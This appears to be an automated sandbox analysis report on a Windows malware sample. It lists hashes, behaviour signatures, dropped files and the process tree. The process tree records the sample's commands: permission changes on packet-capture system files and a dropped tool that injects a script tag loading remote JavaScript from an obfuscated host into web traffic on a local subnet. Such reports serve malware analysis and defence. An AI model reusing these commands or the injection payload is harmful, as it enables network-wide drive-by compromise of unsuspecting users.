Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    24/06/2024, 12:11

General

  • Target

    086d94cc76671c459a82641c71cb9bf9_JaffaCakes118.exe

  • Size

    177KB

  • MD5

    086d94cc76671c459a82641c71cb9bf9

  • SHA1

    5c861601f608475900eeac5a725c00784e2f6449

  • SHA256

    a14bb9fe64112340a2263d9a8990122dabb76c4b3b2c44c322a615a12bf229d7

  • SHA512

    1e10be78d8f51fc7d9878adf067d67612691505f4080dc79f96b72bcefc0f0b5e23f73a84f333448579386687071c0eb92ac08758978388e13318dae074df1b9

  • SSDEEP

    3072:HsfO8Ww3ILyzqNhOq75B95dQryd1KewWsSi/Sk8uBzfsvDktNq6Hy/diJcYxoutF:MfO8Wa06eOGsj/1REvDE46H4QlxoSF

Score
8/10

Malware Config

Signatures

  • Drops file in Drivers directory 1 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Drops file in System32 directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\086d94cc76671c459a82641c71cb9bf9_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\086d94cc76671c459a82641c71cb9bf9_JaffaCakes118.exe"
    1⤵
    • Drops file in Drivers directory
    • Loads dropped DLL
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:2104
    • C:\Windows\SysWOW64\cacls.exe
      "C:\Windows\system32\cacls.exe" C:\Windows\system32\drivers\npf.sys /e /p everyone:f
      2⤵
        PID:1736
      • C:\Windows\SysWOW64\cacls.exe
        "C:\Windows\system32\cacls.exe" C:\Windows\system32\Packet.dll /e /p everyone:f
        2⤵
          PID:1816
        • C:\Windows\SysWOW64\cacls.exe
          "C:\Windows\system32\cacls.exe" C:\Windows\system32\WanPacket.dll /e /p everyone:f
          2⤵
            PID:2676
          • C:\Windows\SysWOW64\cacls.exe
            "C:\Windows\system32\cacls.exe" C:\Windows\system32\wpcap.dll /e /p everyone:f
            2⤵
              PID:2768
            • C:\Windows\SysWOW64\cacls.exe
              "C:\Windows\system32\cacls.exe" C:\Windows\system32\npptools.dll /e /p everyone:f
              2⤵
                PID:2836
              • C:\Windows\SysWOW64\360uagd.exe
                -idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=JavaScript src=http://d%68f.K%77%69k.%54o/tj.js></script>"
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:2656
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c 12.bat
                2⤵
                • Deletes itself
                PID:2924

            Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Temp\12.bat

                    Filesize

                    2KB

                    MD5

                    66bee9478103ba32b0df582763142c79

                    SHA1

                    3699f4f54e8ff93017b5b4bc710353e550f8d0e5

                    SHA256

                    1c18a8fd4baed929a304876bb9cb0bcfa09800bfc2696a4bcd97be2615623e2a

                    SHA512

                    61707d2e51aa36949b7224b7e7d26b59d4b7cdd0473f587ae71fc5ad34dfeeacfb2d7c4035075e06703df3db2f9c07cef1b984814734857ad627b01b9b26665d

                  • C:\Windows\SysWOW64\WPCAP.DLL

                    Filesize

                    234KB

                    MD5

                    ce842d25e5b7e6ff21a86cad9195fbe8

                    SHA1

                    d762270be089a89266b012351b52c595e260b59b

                    SHA256

                    7e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3

                    SHA512

                    84c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6

                  • \Windows\SysWOW64\360uagd.exe

                    Filesize

                    8.0MB

                    MD5

                    7a2d76a6c0bafec2b03c5e05fdecd1f2

                    SHA1

                    670a45ccd8f257e18186192f240e25703adb42b5

                    SHA256

                    cf4bb1dc52fffbfcae24ca8db57a0c8e1b5f79bd7cdaf49e3e8012725749cee1

                    SHA512

                    b9203e50cca63eef35c75aacf07a72ac4df674adff72efdba69cd58684d94327ed7bb3c1f2dceb5bfc0f18b00186eb0ef5736512c873a406d4f8207577f15ffb

                  • \Windows\SysWOW64\Packet.dll

                    Filesize

                    86KB

                    MD5

                    9062aeea8cbfc4f0780bbbefad7cebcb

                    SHA1

                    c4ad39ec51ad0e84fe58f62931d13cddfde3189e

                    SHA256

                    b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c

                    SHA512

                    60957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646

                  • \Windows\SysWOW64\WanPacket.dll

                    Filesize

                    66KB

                    MD5

                    fdd104a9fd3427a1df37041fa947a041

                    SHA1

                    cca1881a3c02033008f78cc39b712b637c7f3e13

                    SHA256

                    384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a

                    SHA512

                    9dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7

                  • memory/2104-0-0x0000000000400000-0x0000000000485000-memory.dmp

                    Filesize

                    532KB

                  • memory/2104-1-0x0000000000400000-0x0000000000485000-memory.dmp

                    Filesize

                    532KB

                  • memory/2104-4-0x0000000000400000-0x0000000000485000-memory.dmp

                    Filesize

                    532KB

                  • memory/2104-9-0x0000000000520000-0x000000000052F000-memory.dmp

                    Filesize

                    60KB

                  • memory/2656-24-0x0000000000400000-0x000000000040F000-memory.dmp

                    Filesize

                    60KB

                  • memory/2656-23-0x0000000000030000-0x0000000000040000-memory.dmp

                    Filesize

                    64KB

                  • memory/2656-20-0x0000000000220000-0x0000000000235000-memory.dmp

                    Filesize

                    84KB